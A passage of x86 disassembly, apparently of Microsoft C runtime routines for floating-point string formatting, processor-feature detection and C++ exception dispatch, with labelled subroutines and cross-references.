cmp dword ptr [eax], 2Dh
mov esi, eax
setz dl
mov edi, ecx
add edx, [ebp+arg_4]
mov eax, edx
call sub_4248EE
jmp short loc_424975
; ---------------------------------------------------------------------------
loc_424941: ; CODE XREF: sub_42490B+D�j
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_427FEF
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add eax, [ebp+arg_4]
add ecx, eax
push ecx
call sub_427EBE
add esp, 14h
loc_424975: ; CODE XREF: sub_42490B+34�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_424981
mov byte ptr [eax], 2Dh
inc eax
loc_424981: ; CODE XREF: sub_42490B+70�j
test ebx, ebx
jle short loc_424996
lea edi, [eax+1]
mov cl, [edi]
mov [eax], cl
mov cl, ds:byte_4437B4
mov eax, edi
mov [eax], cl
loc_424996: ; CODE XREF: sub_42490B+78�j
xor ecx, ecx
cmp ds:byte_4E2978, cl
push offset aE000 ; "e+000"
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_41EEC0
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_4249BD
mov byte ptr [ecx], 45h
loc_4249BD: ; CODE XREF: sub_42490B+AD�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_4249F4
mov eax, [esi+4]
dec eax
jns short loc_4249D1
neg eax
mov byte ptr [ecx], 2Dh
loc_4249D1: ; CODE XREF: sub_42490B+BF�j
inc ecx
cmp eax, 64h
jl short loc_4249E1
cdq
push 64h
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_4249E1: ; CODE XREF: sub_42490B+CA�j
inc ecx
cmp eax, 0Ah
jl short loc_4249F1
cdq
push 0Ah
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_4249F1: ; CODE XREF: sub_42490B+DA�j
add [ecx+1], al
loc_4249F4: ; CODE XREF: sub_42490B+B9�j
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42490B endp
; =============== S U B R O U T I N E =======================================
sub_4249FC proc near ; CODE XREF: sub_424AD9+7D�p
; sub_424B83+1E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp ds:byte_4E2978, 0
push ebx
mov ebx, [esp+4+arg_4]
push ebp
push esi
push edi
jz short loc_424A35
mov eax, ds:dword_4E297C
cmp eax, [esp+10h+arg_8]
mov esi, ds:dword_4E2974
jnz short loc_424A61
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebx
mov eax, ecx
mov byte ptr [eax], 30h
mov byte ptr [eax+1], 0
jmp short loc_424A61
; ---------------------------------------------------------------------------
loc_424A35: ; CODE XREF: sub_4249FC+F�j
mov eax, [esp+10h+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_427FEF
mov esi, eax
mov eax, [esi+4]
add eax, [esp+18h+arg_8]
push esi
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebx
push eax
call sub_427EBE
add esp, 14h
loc_424A61: ; CODE XREF: sub_4249FC+20�j
; sub_4249FC+37�j
cmp dword ptr [esi], 2Dh
mov ebp, ebx
jnz short loc_424A6E
mov byte ptr [ebx], 2Dh
lea ebp, [ebx+1]
loc_424A6E: ; CODE XREF: sub_4249FC+6A�j
mov eax, [esi+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_424A86
mov eax, ebp
call sub_4248EE
mov byte ptr [ebp+0], 30h
inc ebp
jmp short loc_424A88
; ---------------------------------------------------------------------------
loc_424A86: ; CODE XREF: sub_4249FC+7A�j
add ebp, eax
loc_424A88: ; CODE XREF: sub_4249FC+88�j
cmp [esp+10h+arg_8], 0
jle short loc_424AD2
mov eax, ebp
call sub_4248EE
mov al, ds:byte_4437B4
mov [ebp+0], al
mov esi, [esi+4]
inc ebp
test esi, esi
jge short loc_424AD2
neg esi
cmp ds:byte_4E2978, 0
jnz short loc_424AB7
cmp [esp+10h+arg_8], esi
jl short loc_424ABB
loc_424AB7: ; CODE XREF: sub_4249FC+B3�j
mov [esp+10h+arg_8], esi
loc_424ABB: ; CODE XREF: sub_4249FC+B9�j
mov edi, [esp+10h+arg_8]
mov eax, ebp
call sub_4248EE
push edi
push 30h
push ebp
call sub_41E5F0
add esp, 0Ch
loc_424AD2: ; CODE XREF: sub_4249FC+91�j
; sub_4249FC+A8�j
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
retn
sub_4249FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424AD9 proc near ; CODE XREF: sub_424B83+34�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push dword ptr [esi+4]
push dword ptr [esi]
call sub_427FEF
mov ecx, [eax+4]
mov ebx, [ebp+arg_8]
dec ecx
mov ds:dword_4E297C, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
setz cl
push ebx
mov ds:dword_4E2974, eax
add ecx, [ebp+arg_4]
mov edi, ecx
push edi
call sub_427EBE
mov eax, ds:dword_4E2974
mov eax, [eax+4]
add esp, 14h
dec eax
cmp ds:dword_4E297C, eax
mov ds:dword_4E297C, eax
setl cl
cmp eax, 0FFFFFFFCh
mov ds:byte_4E2980, cl
jl short loc_424B60
cmp eax, ebx
jge short loc_424B60
test cl, cl
jz short loc_424B4A
loc_424B40: ; CODE XREF: sub_424AD9+6C�j
mov al, [edi]
inc edi
test al, al
jnz short loc_424B40
mov [edi-2], al
loc_424B4A: ; CODE XREF: sub_424AD9+65�j
push ebx
push [ebp+arg_4]
mov ds:byte_4E2978, 1
push esi
call sub_4249FC
add esp, 0Ch
jmp short loc_424B77
; ---------------------------------------------------------------------------
loc_424B60: ; CODE XREF: sub_424AD9+5D�j
; sub_424AD9+61�j
push [ebp+arg_C]
mov ds:byte_4E2978, 1
push ebx
push [ebp+arg_4]
push esi
call sub_42490B
add esp, 10h
loc_424B77: ; CODE XREF: sub_424AD9+85�j
pop edi
pop esi
mov ds:byte_4E2978, 0
pop ebx
pop ebp
retn
sub_424AD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424B83 proc near ; CODE XREF: sub_4222C8+476�p
; DATA XREF: sub_41FDE2�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_424BBE
cmp [ebp+arg_8], 45h
jz short loc_424BBE
cmp [ebp+arg_8], 66h
jnz short loc_424BAB
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4249FC
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_424BAB: ; CODE XREF: sub_424B83+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_424AD9
jmp short loc_424BCF
; ---------------------------------------------------------------------------
loc_424BBE: ; CODE XREF: sub_424B83+7�j
; sub_424B83+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42490B
loc_424BCF: ; CODE XREF: sub_424B83+39�j
add esp, 10h
pop ebp
retn
sub_424B83 endp
; =============== S U B R O U T I N E =======================================
sub_424BD4 proc near ; CODE XREF: sub_41FE1A+16�p
push 30000h
push 10000h
call sub_4281BE
pop ecx
pop ecx
retn
sub_424BD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424BE6 proc near ; CODE XREF: sub_424C26:loc_424C4A�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_439B88
fstp [ebp+var_8]
fld ds:dbl_439B80
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_439B68
fnstsw ax
test ah, 41h
jnz short loc_424C22
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_424C22: ; CODE XREF: sub_424BE6+35�j
xor eax, eax
leave
retn
sub_424BE6 endp
; =============== S U B R O U T I N E =======================================
sub_424C26 proc near ; CODE XREF: sub_41FE1A+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_42B024 ; GetModuleHandleA
test eax, eax
jz short loc_424C4A
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_42B020 ; GetProcAddress
test eax, eax
jz short loc_424C4A
push 0
call eax ; sub_41FE1A
retn
; ---------------------------------------------------------------------------
loc_424C4A: ; CODE XREF: sub_424C26+D�j
; sub_424C26+1D�j
jmp sub_424BE6
sub_424C26 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424C4F proc near ; CODE XREF: sub_425221+14B�p
arg_0 = dword ptr 4
mov eax, [esi+4]
test eax, eax
jz short loc_424C9A
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_424C9A
mov ecx, [edi+4]
cmp eax, ecx
jz short loc_424C75
add ecx, 8
push ecx
push edx
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_424C97
loc_424C75: ; CODE XREF: sub_424C4F+14�j
test byte ptr [edi], 2
jz short loc_424C7F
test byte ptr [esi], 8
jz short loc_424C97
loc_424C7F: ; CODE XREF: sub_424C4F+29�j
mov eax, [esp+arg_0]
mov eax, [eax]
test al, 1
jz short loc_424C8E
test byte ptr [esi], 1
jz short loc_424C97
loc_424C8E: ; CODE XREF: sub_424C4F+38�j
test al, 2
jz short loc_424C9A
test byte ptr [esi], 2
jnz short loc_424C9A
loc_424C97: ; CODE XREF: sub_424C4F+24�j
; sub_424C4F+2E�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_424C9A: ; CODE XREF: sub_424C4F+5�j
; sub_424C4F+D�j ...
xor eax, eax
inc eax
retn
sub_424C4F endp
; ---------------------------------------------------------------------------
dw 8Bh
dd 73633881h, 374E06Dh, 83C3C033h, 4E298C25h, 0FEE90000h
db 7, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_424CB7 proc near ; CODE XREF: sub_4250FE+31�p
; sub_425413+3B�p
push 10h
push offset dword_439BB8
call sub_425F14
mov ebx, [ebp+8]
mov esi, [ebx+8]
mov [ebp-1Ch], esi
inc ds:dword_4E298C
and dword ptr [ebp-4], 0
mov edi, [ebp+10h]
loc_424CD9: ; CODE XREF: sub_424CB7+89�j
cmp esi, [ebp+14h]
jz short loc_424D42
cmp esi, 0FFFFFFFFh
jle short loc_424CE8
cmp esi, [edi+4]
jl short loc_424CED
loc_424CE8: ; CODE XREF: sub_424CB7+2A�j
call sub_4254E2
loc_424CED: ; CODE XREF: sub_424CB7+2F�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp-20h], esi
mov dword ptr [ebp-4], 1
cmp dword ptr [ecx+4], 0
jz short loc_424D1E
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_425510
loc_424D1E: ; CODE XREF: sub_424CB7+50�j
and dword ptr [ebp-4], 0
jmp short loc_424D3D
; ---------------------------------------------------------------------------
dword_424D24 dd 0E8EC458Bh, 0FFFFFF72h, 0E8658BC3h, 0FC6583h, 8B107D8Bh
; DATA XREF: seg001:00439BC8�o
; seg001:00439BCC�o
dd 758B085Dh
db 0E0h
; ---------------------------------------------------------------------------
loc_424D3D: ; CODE XREF: sub_424CB7+6B�j
mov [ebp-1Ch], esi
jmp short loc_424CD9
; ---------------------------------------------------------------------------
loc_424D42: ; CODE XREF: sub_424CB7+25�j
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_424D64
cmp esi, [ebp+14h]
jz short loc_424D55
call sub_4254E2
loc_424D55: ; CODE XREF: sub_424CB7+97�j
mov [ebx+8], esi
call sub_425F4F
retn
sub_424CB7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
word_424D5E dw 5D8Bh ; DATA XREF: seg001:00439BC0�o
dd 0E4758B08h
; =============== S U B R O U T I N E =======================================
sub_424D64 proc near ; CODE XREF: sub_424CB7+8F�p
cmp ds:dword_4E298C, 0
jle short locret_424D73
dec ds:dword_4E298C
locret_424D73: ; CODE XREF: sub_424D64+7�j
retn
sub_424D64 endp
; =============== S U B R O U T I N E =======================================
sub_424D74 proc near ; CODE XREF: sub_424F1C+5E�p
; sub_425221+1B8�p
push 8
push offset dword_439BD0
call sub_425F14
mov eax, [ebp+8]
test eax, eax
jz short loc_424DA2
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_424DA2
and dword ptr [ebp-4], 0
push ecx
push dword ptr [eax+18h]
call sub_41FEF0
or dword ptr [ebp-4], 0FFFFFFFFh
loc_424DA2: ; CODE XREF: sub_424D74+11�j
; sub_424D74+1B�j
call sub_425F4F
retn
sub_424D74 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 4538C033h, 0C0950F0Ch, 0E8658BC3h, 6FCE9h
db 0
; =============== S U B R O U T I N E =======================================
sub_424DB9 proc near ; CODE XREF: sub_424F82+7C�p
; sub_424F82+FB�p ...
push esi
mov esi, eax
mov eax, [ecx]
add eax, esi
cmp dword ptr [ecx+4], 0
jl short loc_424DD6
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_424DD6: ; CODE XREF: sub_424DB9+B�j
pop esi
retn
sub_424DB9 endp
; =============== S U B R O U T I N E =======================================
sub_424DD8 proc near ; CODE XREF: sub_4250FE+52�p
push 40h
push offset dword_439BE0
call sub_425F14
mov ebx, ecx
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
mov [ebp-20h], ebx
and dword ptr [ebp-48h], 0
mov eax, [edi-4]
mov [ebp-38h], eax
push dword ptr [esi+18h]
lea eax, [ebp-50h]
push eax
call sub_4201AB
pop ecx
pop ecx
mov [ebp-3Ch], eax
mov eax, ds:dword_4E2984
mov [ebp-40h], eax
mov eax, ds:dword_4E2988
mov [ebp-44h], eax
mov ds:dword_4E2984, esi
mov eax, [ebp+10h]
mov ds:dword_4E2988, eax
and dword ptr [ebp-4], 0
mov dword ptr [ebp-4], 1
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push ebx
push dword ptr [ebp+14h]
push edi
call sub_420218
add esp, 14h
mov [ebp-20h], eax
and dword ptr [ebp-4], 0
jmp loc_424F01
; ---------------------------------------------------------------------------
aLeL db '‹Eì‹',0 ; DATA XREF: seg001:00439BF0�o
db 89h
dword_424E58 dd 458BE445h, 633881E4h, 75E06D73h, 0E4458B31h, 3107883h
dd 458B2875h, 147881E4h, 19930520h, 458B0C74h, 147881E4h
dd 19930521h, 458B1075h, 1C7883E4h, 0DC45C700h, 1, 45C70774h
dd 0DCh, 0DC458B00h, 0E8658BC3h, 8B144D8Bh, 45890841h
dd 0C7D8BD0h, 8908478Bh, 518BD845h, 0D4558910h, 5589D233h
dd 0C513BCCh, 348D2473h, 0D45D8B92h, 8BB3348Dh, 0C33B045Eh
dd 463B3D7Eh, 8D387F08h, 45890143h, 0D0558BD8h, 89C2048Bh
dd 5150D845h, 5756F633h, 0FFFDC2E8h, 10C483FFh, 89E07589h
dd 758BFC75h
db 8
; ---------------------------------------------------------------------------
loc_424F01: ; CODE XREF: sub_424DD8+75�j
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_424F1C
mov eax, [ebp-20h]
call sub_425F4F
retn
sub_424DD8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 42h
dword_424F14 dd 7D8BA8EBh, 8758B0Ch ; DATA XREF: seg001:00439BE8�o
; =============== S U B R O U T I N E =======================================
sub_424F1C proc near ; CODE XREF: sub_424DD8+12D�p
mov eax, [ebp-38h]
mov [edi-4], eax
push dword ptr [ebp-3Ch]
call sub_4201DF
pop ecx
mov eax, [ebp-40h]
mov ds:dword_4E2984, eax
mov eax, [ebp-44h]
mov ds:dword_4E2988, eax
cmp dword ptr [esi], 0E06D7363h
jnz short locret_424F81
cmp dword ptr [esi+10h], 3
jnz short locret_424F81
mov eax, [esi+14h]
cmp eax, 19930520h
jz short loc_424F5A
cmp eax, 19930521h
jnz short locret_424F81
loc_424F5A: ; CODE XREF: sub_424F1C+35�j
cmp dword ptr [ebp-48h], 0
jnz short locret_424F81
cmp dword ptr [ebp-20h], 0
jz short locret_424F81
push dword ptr [esi+18h]
call sub_4201C4
pop ecx
test eax, eax
jz short locret_424F81
call sub_42031E
push eax
push esi
call sub_424D74
pop ecx
pop ecx
locret_424F81: ; CODE XREF: sub_424F1C+25�j
; sub_424F1C+2B�j ...
retn
sub_424F1C endp
; =============== S U B R O U T I N E =======================================
sub_424F82 proc near ; CODE XREF: sub_4250FE+D�p
push 8
push offset dword_439BF8
call sub_425F14
mov esi, ecx
mov eax, [ebp+0Ch]
mov edi, edx
mov ebx, [ebp+8]
mov ecx, [eax+4]
test ecx, ecx
jz loc_4250EC
cmp byte ptr [ecx+8], 0
jz loc_4250EC
mov ecx, [eax+8]
test ecx, ecx
jnz short loc_424FBE
test byte ptr [eax+3], 80h
jz loc_4250EC
loc_424FBE: ; CODE XREF: sub_424F82+30�j
mov eax, [eax]
test eax, eax
js short loc_424FC8
lea edi, [ecx+edi+0Ch]
loc_424FC8: ; CODE XREF: sub_424F82+40�j
and dword ptr [ebp-4], 0
push 1
push dword ptr [ebx+18h]
test al, 8
jz short loc_42500A
call sub_4281D4
pop ecx
pop ecx
test eax, eax
jz loc_4250E3
push 1
push edi
call sub_4281F0
pop ecx
pop ecx
test eax, eax
jz loc_4250E3
mov eax, [ebx+18h]
mov [edi], eax
loc_424FFB: ; CODE XREF: sub_424F82+D1�j
lea ecx, [esi+8]
call sub_424DB9
mov [edi], eax
jmp loc_4250E8
; ---------------------------------------------------------------------------
loc_42500A: ; CODE XREF: sub_424F82+51�j
test byte ptr [esi], 1
jz short loc_425055
call sub_4281D4
pop ecx
pop ecx
test eax, eax
jz loc_4250E3
push 1
push edi
call sub_4281F0
pop ecx
pop ecx
test eax, eax
jz loc_4250E3
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_41F980
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_4250E8
mov eax, [edi]
test eax, eax
jz loc_4250E8
jmp short loc_424FFB
; ---------------------------------------------------------------------------
loc_425055: ; CODE XREF: sub_424F82+8B�j
cmp dword ptr [esi+18h], 0
jnz short loc_42508E
call sub_4281D4
pop ecx
pop ecx
test eax, eax
jz short loc_4250E3
push 1
push edi
call sub_4281F0
pop ecx
pop ecx
test eax, eax
jz short loc_4250E3
push dword ptr [esi+14h]
lea ecx, [esi+8]
mov eax, [ebx+18h]
call sub_424DB9
push eax
push edi
call sub_41F980
add esp, 0Ch
jmp short loc_4250E8
; ---------------------------------------------------------------------------
loc_42508E: ; CODE XREF: sub_424F82+D7�j
call sub_4281D4
pop ecx
pop ecx
test eax, eax
jz short loc_4250E3
push 1
push edi
call sub_4281F0
pop ecx
pop ecx
test eax, eax
jz short loc_4250E3
push dword ptr [esi+18h]
call sub_42820C
pop ecx
test eax, eax
jz short loc_4250E3
mov eax, [ebx+18h]
lea ecx, [esi+8]
test byte ptr [esi], 4
jz short loc_4250D2
push 1
call sub_424DB9
push eax
push dword ptr [esi+18h]
push edi
call sub_41FEF0
jmp short loc_4250E8
; ---------------------------------------------------------------------------
loc_4250D2: ; CODE XREF: sub_424F82+13B�j
call sub_424DB9
push eax
push dword ptr [esi+18h]
push edi
call sub_41FEF0
jmp short loc_4250E8
; ---------------------------------------------------------------------------
loc_4250E3: ; CODE XREF: sub_424F82+5C�j
; sub_424F82+6E�j ...
call sub_4254E2
loc_4250E8: ; CODE XREF: sub_424F82+83�j
; sub_424F82+C1�j ...
or dword ptr [ebp-4], 0FFFFFFFFh
loc_4250EC: ; CODE XREF: sub_424F82+1B�j
; sub_424F82+25�j ...
call sub_425F4F
retn
sub_424F82 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 0C033h
dd 658BC340h, 3B7E9E8h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4250FE proc near ; CODE XREF: sub_425165+9E�p
; sub_425221+18D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
test ecx, ecx
jz short loc_425112
push ebx
push [ebp+arg_0]
mov edx, esi
call sub_424F82
pop ecx
pop ecx
loc_425112: ; CODE XREF: sub_4250FE+5�j
cmp [ebp+arg_14], 0
push [ebp+arg_0]
jnz short loc_42511E
push esi
jmp short loc_425121
; ---------------------------------------------------------------------------
loc_42511E: ; CODE XREF: sub_4250FE+1B�j
push [ebp+arg_14]
loc_425121: ; CODE XREF: sub_4250FE+1E�j
call sub_41FEF7
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_424CB7
mov eax, [edi+4]
push 100h
push [ebp+arg_10]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_424DD8
add esp, 28h
test eax, eax
jz short loc_425163
push esi
push eax
call sub_41FEC0
loc_425163: ; CODE XREF: sub_4250FE+5C�j
pop ebp
retn
sub_4250FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425165 proc near ; CODE XREF: sub_425221+1E3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 80000003h
jz locret_42521F
cmp ds:dword_4E2990, 0
jz short loc_4251A1
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41FFBA
add esp, 1Ch
test eax, eax
jnz short locret_42521F
loc_4251A1: ; CODE XREF: sub_425165+1B�j
push esi
mov esi, [ebp+arg_14]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_420131
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_42521D
push ebx
loc_4251C8: ; CODE XREF: sub_425165+B5�j
cmp esi, [edi]
jl short loc_42520E
cmp esi, [edi+4]
jg short loc_42520E
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_4251E9
cmp byte ptr [ecx+8], 0
jnz short loc_42520E
loc_4251E9: ; CODE XREF: sub_425165+7C�j
push [ebp+arg_1C]
mov esi, [ebp+arg_4]
push [ebp+arg_18]
lea ebx, [eax-10h]
push [ebp+arg_10]
xor ecx, ecx
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_4250FE
mov esi, [ebp+arg_14]
add esp, 18h
loc_42520E: ; CODE XREF: sub_425165+65�j
; sub_425165+6A�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_4251C8
pop ebx
loc_42521D: ; CODE XREF: sub_425165+60�j
pop edi
pop esi
locret_42521F: ; CODE XREF: sub_425165+E�j
; sub_425165+3A�j
leave
retn
sub_425165 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425221 proc near ; CODE XREF: sub_425413+93�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_4]
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_1], 0
mov [ebp+var_1C], eax
jl short loc_425241
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_425246
loc_425241: ; CODE XREF: sub_425221+16�j
; DATA XREF: seg001:off_4372D8�o
call sub_4254E2
loc_425246: ; CODE XREF: sub_425221+1E�j
push ebx
mov ebx, [ebp+arg_0]
cmp dword ptr [ebx], 0E06D7363h
push esi
push edi
jnz loc_4253E8
cmp dword ptr [ebx+10h], 3
mov edi, 19930520h
jnz short loc_4252DC
mov eax, [ebx+14h]
cmp eax, edi
jz short loc_425271
cmp eax, 19930521h
jnz short loc_4252DC
loc_425271: ; CODE XREF: sub_425221+47�j
cmp dword ptr [ebx+1Ch], 0
jnz short loc_4252DC
mov eax, ds:dword_4E2984
test eax, eax
jz loc_4253E0
mov esi, eax
mov eax, ds:dword_4E2988
push 1
push esi
mov [ebp+arg_0], esi
mov [ebp+arg_8], eax
mov [ebp+var_1], 1
call sub_4281D4
test eax, eax
pop ecx
pop ecx
jnz short loc_4252A8
call sub_4254E2
loc_4252A8: ; CODE XREF: sub_425221+80�j
cmp dword ptr [esi], 0E06D7363h
jnz loc_4253E5
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_4252D9
mov eax, [eax+14h]
cmp eax, edi
jz short loc_4252CB
cmp eax, 19930521h
jnz short loc_4252D9
loc_4252CB: ; CODE XREF: sub_425221+A1�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+1Ch], 0
jnz short loc_4252D9
call sub_4254E2
loc_4252D9: ; CODE XREF: sub_425221+9A�j
; sub_425221+A8�j ...
mov ebx, [ebp+arg_0]
loc_4252DC: ; CODE XREF: sub_425221+40�j
; sub_425221+4E�j ...
cmp dword ptr [ebx], 0E06D7363h
jnz loc_4253E8
cmp dword ptr [ebx+10h], 3
jnz loc_4253E8
mov eax, [ebx+14h]
cmp eax, edi
jz short loc_425304
cmp eax, 19930521h
jnz loc_4253E8
loc_425304: ; CODE XREF: sub_425221+D6�j
mov esi, [ebp+var_1C]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_C]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_420131
mov ecx, [ebp+var_C]
add esp, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_8], eax
jnb loc_4253D0
jmp short loc_425332
; ---------------------------------------------------------------------------
loc_42532F: ; CODE XREF: sub_425221+1A9�j
mov esi, [ebp+var_1C]
loc_425332: ; CODE XREF: sub_425221+10C�j
cmp [eax], esi
jg loc_4253BB
cmp esi, [eax+4]
jg short loc_4253BB
mov ecx, [eax+0Ch]
test ecx, ecx
mov esi, [eax+10h]
mov [ebp+var_18], ecx
jle short loc_4253BB
loc_42534C: ; CODE XREF: sub_425221+16E�j
mov ecx, [ebx+1Ch]
mov ecx, [ecx+0Ch]
lea edx, [ecx+4]
mov ecx, [ecx]
test ecx, ecx
mov [ebp+var_10], edx
mov [ebp+var_14], ecx
jle short loc_425385
loc_425361: ; CODE XREF: sub_425221+15F�j
mov eax, [ebp+var_10]
mov edi, [eax]
push dword ptr [ebx+1Ch]
mov [ebp+var_24], edi
call sub_424C4F
test eax, eax
pop ecx
jnz short loc_425393
dec [ebp+var_14]
add [ebp+var_10], 4
cmp [ebp+var_14], eax
jg short loc_425361
mov eax, [ebp+var_8]
loc_425385: ; CODE XREF: sub_425221+13E�j
dec [ebp+var_18]
add esi, 10h
cmp [ebp+var_18], 0
jg short loc_42534C
jmp short loc_4253BB
; ---------------------------------------------------------------------------
loc_425393: ; CODE XREF: sub_425221+153�j
push [ebp+arg_1C]
mov edi, [ebp+var_8]
push [ebp+arg_18]
mov ecx, [ebp+var_24]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
mov ebx, esi
mov esi, [ebp+arg_4]
call sub_4250FE
mov ebx, [ebp+arg_0]
add esp, 18h
mov eax, edi
loc_4253BB: ; CODE XREF: sub_425221+113�j
; sub_425221+11C�j ...
inc [ebp+var_C]
mov ecx, [ebp+var_C]
add eax, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_8], eax
jb loc_42532F
loc_4253D0: ; CODE XREF: sub_425221+106�j
cmp [ebp+arg_14], 0
jz short loc_4253E0
push 1
push ebx
call sub_424D74
pop ecx
pop ecx
loc_4253E0: ; CODE XREF: sub_425221+5D�j
; sub_425221+1B3�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4253E5: ; CODE XREF: sub_425221+8D�j
mov ebx, [ebp+arg_0]
loc_4253E8: ; CODE XREF: sub_425221+31�j
; sub_425221+C1�j ...
